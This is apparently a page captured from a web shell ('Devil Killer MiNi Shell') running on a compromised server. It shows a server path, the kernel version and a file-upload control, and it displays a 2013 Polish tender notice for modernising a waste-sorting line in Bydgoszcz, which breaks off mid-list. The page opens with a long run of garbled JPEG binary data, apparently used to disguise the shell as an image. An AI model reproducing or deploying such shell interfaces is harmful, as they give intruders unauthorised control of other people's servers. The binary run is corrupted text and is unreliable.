JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/21898-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Modernizacja linii sortowniczej realizowanej w ramach projektu pn. Rozwój systemu zagospodarowania odpadów komunalnych wraz z rozbudową KUO w Bydgoszczy<br>
MKUO ProNatura/ZP/NO/2/13 <br></b><br>
<b>Numer ogłoszenia: 21898 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzygminny Kompleks Unieszkodliwiania Odpadów ProNatura  Sp. z o. o. , ul. Prądocińska 28, 85-893 Bydgoszcz, woj. kujawsko-pomorskie, tel. 0-52 52 220 47, faks 52 3493897.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pronatura.bydgoszcz.pl, www.mkuok.nbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja linii sortowniczej realizowanej w ramach projektu pn. Rozwój systemu zagospodarowania odpadów komunalnych wraz z rozbudową KUO w Bydgoszczy<br>
MKUO ProNatura/ZP/NO/2/13 <br>.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie projektu, budowa i przekazanie do użytkowania obiektu budowlanego w ramach rozbudowy istniejącej hali sortowni wraz z modernizacją linii sortowniczej odpadów komunalnych zmieszanych o magazyn buforowy, wiatę - zadaszenie z osłonami wiatrowymi nad kontenerami zewnętrznymi i pomieszczenie przeznaczone na lokalizację separatora optoelektronicznego NIR oraz budowę wolnostojącego magazynu surowców z przyłączami i sieciami instalacyjnymi wraz z układem dróg dojazdowych, placów manewrowych i zagospodarowaniem terenu przy ul. Prądocińskiej 28 w Bydgoszczy na podstawie: opracowanego programu funkcjonalno-użytkowego będącego załącznikiem nr 4 do specyfikacji<br>
2. Zakres zamówienia obejmuje:<br>
2.1 projekt modernizacji Stacji Segregacji Odpadów wraz z magazynem surowców,<br>
2.2 dostawę maszyn i urządzeń,<br>
2.3 montaż maszyn i urządzeń,<br>
2.4 wykonanie robót budowlanych,<br>
2.5 wykonanie inwentaryzacji i dokumentacji powykonawczej,<br>
2.6 opracowanie i przekazanie do zatwierdzenia wszelkich dokumentów, koncepcji Dokumentacji Techniczno-Ruchowej (DTR), protokołów dotyczących kolejnych urządzeń prac montażowych wraz z wynikami badań jeżeli takie były konieczne,<br>
2.7 rozruch mechaniczny, dostosowujący do układu linii po modernizacji sortowni, a także wszelkie inne działania niezbędne do odbioru i przejęcia przedmiotu zamówienia przez Zamawiającego,<br>
2.8 wykonanie wszelkich niezbędnych prac towarzyszących i robót tymczasowych niezbędnych do realizacji ukończenia robót podstawowych objętych przedmiotem zamówienia,<br>
2.9 szkolenie personelu.<br>
3.Zakres zamówienia obejmuje w szczególności:<br>
Na etapie przygotowania do rozpoczęcia robót<br>
- opracowanie harmonogramu rzeczowo-finansowego wykonania robót,<br>
- opracowanie projektu zagospodarowania zaplecza budowy wraz z niezbędnymi uzgodnieniami, oraz jego wykonanie wraz z zapewnieniem zasilania w niezbędne media. Teren zaplecza powinien być ogrodzony i oświetlony,<br>
- opracowanie wniosków i uzyskanie w imieniu Zamawiającego niezbędnych ostatecznych pozwoleń, decyzji lub ich zmian w celu przekazania zrealizowanych obiektów do eksploatacji zgodnie z obowiązującym prawem, a w szczególności:<br>
a) decyzji ustalającej lokalizację inwestycji celu publicznego,<br>
b) pozwolenie wodno prawne (jeśli to konieczne, odprowadzenie wód deszczowych do gruntu),<br>
c) decyzji o pozwoleniu na budowę,<br>
d) decyzji o pozwoleniu na użytkowanie (poprzedzone pozytywnym stanowiskiem organów: Państwowa Straż Pożarna, Państwowa Inspekcja Sanitarna, Państwowa Inspekcja Pracy, oraz o ile to jest konieczne decyzji Wojewódzkiego Inspektoratu Ochrony Środowiska<br>
- wykonanie projektu oraz robót budowlanych z dostawą i montażem urządzeń oraz wyposażenia polegających na:<br>
a) zaprojektowaniu i budowie: magazynu buforowego, obudowy separatora, wiaty nad wózkami przesuwającymi kontenery oraz magazynu surowców<br>
b) przebudowie przenośnika sortującego frakcji nadsitowej,<br>
c) dostawie urządzeń,<br>
d) montażu konstrukcji wsporczych pod przenośniki, separator, kabinę,<br>
e) montażu urządzeń wraz z rozruchem mechanicznym dostosowującym nowy układ do obecnie funkcjonującego,<br>
f) przeszkolenie pracowników do bieżącej eksploatacji i konserwacji,<br>
g) wykonanie przeglądów wynikających z instrukcji eksploatacji w okresie gwarancji.
Naprawa wszelkich zniszczeń i uszkodzeń dokonanych przez uczestniczących w procesie realizacji inwestycji, zarówno na terenie KUO jak i poza nim, spoczywa na Wykonawcy.<br>
4. Dane techniczne<br>
4.1 Szczegółowy opis przedmiotu zamówienia zawiera:<br>
Załącznik nr 3 do SIWZ - Opis przedmiotu zamówienia,<br>
4.2 Należy bezwzględnie przestrzegać przepisów BHP i przeciwpożarowych. Roboty wykonywać zgodnie ze sztuką prac montażowych, wymogami norm oraz ściśle wg technologii i zaleceń producentów urządzeń.<br>
4.3 Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu KUO w celu zdobycia wszelkich dodatkowych informacji, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Termin wizji lokalnej został sprecyzowany przez Zamawiającego w części VI, pkt. 6 niniejszej specyfikacji.<br>
4.5 Prace budowlane i montażowe będą wykonywane na terenie czynnego KUO.<br>
4.6 Ze względu na charakter zamknięty obiektu, Wykonawca ma obowiązek przekazania Zamawiającemu listy pracowników, którzy wykonywać będą przedmiotowe prace budowlane i montażowe na terenie KUO. Listę pracowników, będzie można zmienić dokonując właściwej korekty osobowej i przedkładając ją kierownikowi KUO, nie później niż na dzień przed kolejnym dniem roboczym w którym korekta osobowa miałaby nastąpić. Wykonawca musi bezwzględnie przestrzegać regulaminu KUO.<br>
4.7 Wymagany okres gwarancji na przedmiotowe roboty to 36 miesięcy, licząc od dnia zatwierdzenia przez Zamawiającego Protokołu Potwierdzającego wykonanie Umowy.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 PZP, polegających na powtórzeniu tego samego rodzaju zamówień, co objęte zamówieniem podstawowym.<br></li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.22.00.00-5, 45.21.13.50-7, 45.11.21.00-6, 45.26.23.00-4, 45.22.35.00-1, 42.41.72.00-4, 45.23.31.00-0, 45.23.32.00-1, 45.23.33.00-2, 74.20.00.00-1, 74.23.00.00-4, 74.23.00.00-7, 45.11.41.00-1, 45.11.12.91-4, 45.22.31.00-7, 45.22.32.00-7, 45.23.13.00-8, 45.23.14.00-9, 42.99.00.00-2, 43.41.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium na całość zamówienia w wysokości 150.000,00PLN (słownie: sto tysięcy PLN).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek oceniony zostanie na podstawie złożonego oświadczenia<br></p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawca ubiegający się o zamówienie musi wykazać się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie:<br>
- w zakresie robót budowlano - montażowych hali z konstrukcji stalowych nie mniejszych niż 1500 m2 o wartości minimum 1.500.000,00 PLN brutto<br>
- w zakresie dostaw linii sortowniczej odpadów komunalnych zmieszanych wyposażonej minimum jeden separator optoelektroniczny NIR lub modernizacji linii sortowniczej odpadów komunalnych zmieszanych polegającej na doposażeniu linii w separator optoelektroniczny NIR o wartości nie mniejszej niż 2.000.000,00 PLN brutto<br>
Powyższe zadania nie muszą być zrealizowane w ramach jednej umowy<br>
Warunek oceniony zostanie na podstawie złożonego oświadczenia i dokumentów<br></p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w tym zakresie. Warunek oceniony zostanie na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu.<br></p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania ww. warunku Wykonawca ubiegający się o niniejsze zamówienie musi wykazać, iż dysponuje (będzie dysponować) następującymi osobami oraz dostarczyć informacje na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami. <br>
Wymagane jest wskazanie po jednej osobie do pełnienia funkcji:<br>
Projektant branży konstrukcyjno-budowlanej, - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do projektowania bez ograniczeń w specjalności konstrukcyjno - budowlanej,<br>
Projektant branży maszyn i urządzeń (linii sortowniczych odpadów komunalnych), - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 3 lata doświadczenia zawodowego;<br>
Projektant branży instalacyjno-sanitarnej, - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do projektowania bez ograniczeń w specjalności instalacyjno-sanitarnej,<br>
Projektant branży instalacyjno-energetycznej, - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do projektowania bez ograniczeń w specjalności instalacyjno-energetycznej,
Wymagane jest wskazanie po jednej osobie do pełnienia funkcji w zakresie nadzoru wykonawczego:<br>
Kierownik budowy - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 8 lat doświadczenia zawodowego;<br>
- co najmniej 5 lata doświadczenia zawodowego po uzyskaniu uprawnień do kierowania robotami budowlanymi w jednej z poniżej wymienionych specjalności:<br>
- budowlano - montażowymi;<br>
- instalacyjno - energetycznej;<br>
- drogowej<br>
Kierownik robót budowlano - montażowych - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie średnie lub wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego przy montażu konstrukcji stalowych;<br>
Kierownik robót drogowych - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie średnie lub wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do kierowania robotami budowlanymi w specjalności drogowej;<br>
Kierownik robót instalacyjnych w zakresie instalacji i urządzeń elektrycznych - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
-wykształcenie wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do kierowania robotami elektrycznymi;<br>
Kierownik robót instalacyjnych w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych- niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne;<br>
- co najmniej 5 lat doświadczenia zawodowego;<br>
- co najmniej 3 lata doświadczenia zawodowego po uzyskaniu uprawnień do kierowania robotami budowlanymi w ww.specjalności;<br>
Kierownik robót instalacyjnych w zakresie instalacji maszyn i urządzeń - niniejsza osoba musi posiadać następujące doświadczenie i kwalifikacje:<br>
- wykształcenie wyższe techniczne - inżynier mechanik<br>
- co najmniej 5 lat doświadczenia zawodowego<br>
- przeprowadzenie co najmniej 1 montażu lub modernizacji linii sortowniczej odpadów w zakresie którego wchodził separator optoelektroniczny NIR.<br>

Kierownik budowy może być jednocześnie kierownikiem jednego z wymienionych wyżej rodzajów robót. Każda z wymienionych osób musi posiadać stosowne uprawnienia w zakresie prowadzenia robót.<br>
Warunek oceniony zostanie na podstawie złożonego oświadczenia i dokumentów (wykazów)<br></p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku Wykonawca ubiegający się o niniejsze zamówienie, musi wykazać się:<br>
a) osiąganiem w okresie ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, sumarycznych przychodów netto ze sprzedaży w wysokości, co najmniej 10.000.000,00 PLN netto, w tym w ostatnim roku obrotowym, co najmniej 5.000.000,00 PLN netto,<br>
b) posiadaniem środków finansowych lub zdolności kredytowej w wysokości co najmniej 2.000.000,00 PLN,<br>
c) posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości, co najmniej 3.000.000,00 PLN. Wykonawca jest zobowiązany zapewnić trwałość ubezpieczenia przez cały okres związania umową.<br>
Warunek oceniony zostanie na podstawie złożonych dokumentów<br></p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu z art. 22 ust. 1 PZP, wzór załączony jest do formularza oferty (załącznik 2 do formularza oferty) - w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ww. dokument może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez pełnomocnika albo przez upoważnionych przedstawicieli każdego z Wykonawców składających ofertę wspólną.<br>
2. Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wzór został załączony do formularza oferty (załącznik 3 do formularza oferty). Wykaz powinien potwierdzać spełnianie warunku o którym mowa w Cz. III ust. 1 pkt 1.2 ppkt 2) SIWZ oraz zawierać:<br>
